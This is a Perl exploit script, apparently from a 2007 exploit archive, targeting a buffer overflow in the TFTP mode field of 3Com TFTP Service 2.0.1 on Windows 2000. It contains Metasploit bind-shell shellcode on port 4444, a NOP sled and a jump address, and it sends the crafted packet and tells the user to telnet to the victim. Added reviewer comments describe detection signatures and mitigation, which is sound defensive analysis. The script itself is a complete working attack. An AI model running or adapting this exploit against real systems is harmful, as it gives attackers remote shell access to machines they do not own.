#!/usr/bin/perl -w
# ===============================================================================================
# 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Perl Exploit
# By Umesh Wanve (umesh_345@yahoo.com)
# ==============================================================================================
# Credits : Liu Qixu is credited with the discovery of this vulnerability.
#
# Reference : http://www.securityfocus.com/bid/21301
#
# Date : 27-02-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Buffer overflow exists in transporting mode name of TFTP server.
#
# So here you go.
#
# Buffer = "\x00\x02" + "filename" + "\x00" + nop sled + Shellcode + JUMP + "\x00";
#
#
# This was written for educational purpose. Use it at your own risk.Author will be not be responsible for any damage.
#
#
#
#===============================================================================================
#
# NOTE(review): this file was recovered from a page where every line had been
# joined together; the line breaks below were restored at the points where a
# statement or comment certainly ends.  The code itself is untouched.
#
# Reviewer summary (defender's view):
#   - The vulnerable field is the TFTP "mode" string of a write request
#     (RFC 1350: 2-byte opcode, filename, NUL, mode, NUL).  The mode is
#     normally one of the short tokens netascii / octet / mail; here it is
#     filled with roughly 129 + 344 + 4 bytes (NOP sled, payload, address).
#     A WRQ/RRQ whose mode field is not one of those three tokens, or is
#     longer than a few bytes, is a simple network-level signature for this
#     class of attack.
#   - Per the generator line above the payload, the shellcode is a Metasploit
#     bind shell on TCP 4444, so on a host that was hit the indicator is a new
#     listener on that port (the script's last message relies on it).
#   - TFTP carries no authentication; mitigation beyond the vendor fix is not
#     to expose the service outside a management network.
#   - The shebang's -w is the only warnings switch; there is no `use strict`,
#     so $target, $nop, $jmp_2000 and $exploit below are package globals.

use IO::Socket;

# Only the second argument (port) is tested.  A missing host or a non-numeric
# port is not caught here and would at best surface in the socket constructor.
if(!($ARGV[1])) {
print "\n3COM Tftp long transport name exploit\n";
print "\tCoded by Umesh wanve\n\n";
# The usage string carries no argument placeholders; presumably "<host> <port>"
# was stripped by HTML rendering of the original listing -- verify.
print "Use: 3com_tftp.pl \n\n";
exit;
}

# UDP connect() does no handshake, so reaching past this `or die` says nothing
# about whether a TFTP service is actually listening on the peer.
$target = IO::Socket::INET->new(Proto=>'udp', PeerAddr=>$ARGV[0], PeerPort=>$ARGV[1]) or die "Cannot connect to $ARGV[0] on port $ARGV[1]";

# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
# 21 lines of 16 bytes plus 8 bytes = 344 bytes, matching the Size above.
my($shellcode)=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x48".
"\xc8\xb3\x54\x83\xeb\xfc\xe2\xf4\xb4\xa2\x58\x19\xa0\x31\x4c\xab".
"\xb7\xa8\x38\x38\x6c\xec\x38\x11\x74\x43\xcf\x51\x30\xc9\x5c\xdf".
"\x07\xd0\x38\x0b\x68\xc9\x58\x1d\xc3\xfc\x38\x55\xa6\xf9\x73\xcd".
"\xe4\x4c\x73\x20\x4f\x09\x79\x59\x49\x0a\x58\xa0\x73\x9c\x97\x7c".
"\x3d\x2d\x38\x0b\x6c\xc9\x58\x32\xc3\xc4\xf8\xdf\x17\xd4\xb2\xbf".
"\x4b\xe4\x38\xdd\x24\xec\xaf\x35\x8b\xf9\x68\x30\xc3\x8b\x83\xdf".
"\x08\xc4\x38\x24\x54\x65\x38\x14\x40\x96\xdb\xda\x06\xc6\x5f\x04".
"\xb7\x1e\xd5\x07\x2e\xa0\x80\x66\x20\xbf\xc0\x66\x17\x9c\x4c\x84".
"\x20\x03\x5e\xa8\x73\x98\x4c\x82\x17\x41\x56\x32\xc9\x25\xbb\x56".
"\x1d\xa2\xb1\xab\x98\xa0\x6a\x5d\xbd\x65\xe4\xab\x9e\x9b\xe0\x07".
"\x1b\x9b\xf0\x07\x0b\x9b\x4c\x84\x2e\xa0\xa2\x08\x2e\x9b\x3a\xb5".
"\xdd\xa0\x17\x4e\x38\x0f\xe4\xab\x9e\xa2\xa3\x05\x1d\x37\x63\x3c".
"\xec\x65\x9d\xbd\x1f\x37\x65\x07\x1d\x37\x63\x3c\xad\x81\x35\x1d".
"\x1f\x37\x65\x04\x1c\x9c\xe6\xab\x98\x5b\xdb\xb3\x31\x0e\xca\x03".
"\xb7\x1e\xe6\xab\x98\xae\xd9\x30\x2e\xa0\xd0\x39\xc1\x2d\xd9\x04".
"\x11\xe1\x7f\xdd\xaf\xa2\xf7\xdd\xaa\xf9\x73\xa7\xe2\x36\xf1\x79".
"\xb6\x8a\x9f\xc7\xc5\xb2\x8b\xff\xe3\x63\xdb\x26\xb6\x7b\xa5\xab".
"\x3d\x8c\x4c\x82\x13\x9f\xe1\x05\x19\x99\xd9\x55\x19\x99\xe6\x05".
"\xb7\x18\xdb\xf9\x91\xcd\x7d\x07\xb7\x1e\xd9\xab\xb7\xff\x4c\x84".
"\xc3\x9f\x4f\xd7\x8c\xac\x4c\x82\x1a\x37\x63\x3c\xb8\x42\xb7\x0b".
"\x1b\x37\x65\xab\x98\xc8\xb3\x54";

print "++ Building Malicous Packet .....\n";
$nop="\x90" x 129;
# A single hard-coded little-endian address tied to one DLL build (see the
# trailing comment); the script has no other target variant and no fallback.
$jmp_2000 = "\x0e\x08\xe5\x77"; # jmp esi user32.dll windows 2000 sp4 english (on 27-02-2007)
# Packet assembly follows the RFC 1350 request layout; everything between the
# second NUL and the final NUL is what the server parses as the mode name.
$exploit = "\x00\x02"; #write request (header)
$exploit=$exploit."A"; #file name
$exploit=$exploit."\x00"; #Start of transporting name
$exploit=$exploit.$nop; #nop sled to land into shellcode
$exploit=$exploit.$shellcode; #our Hell code
$exploit=$exploit.$jmp_2000; #jump to shellcode
$exploit=$exploit."\x00"; #end of TS mode name
# One datagram, fire-and-forget: nothing is ever read back from $target, so
# the "sent" / "Done" messages only confirm the write, not the outcome.
print $target $exploit; #Attack on victim
print "++ Exploit packet sent ...\n";
print "++ Done.\n";
print "++ Telnet to 4444 on victim's machine ....\n";
sleep(2);
close($target);
exit;
#------------------------------------------------------------------------------------------------------------
# milw0rm.com [2007-02-28]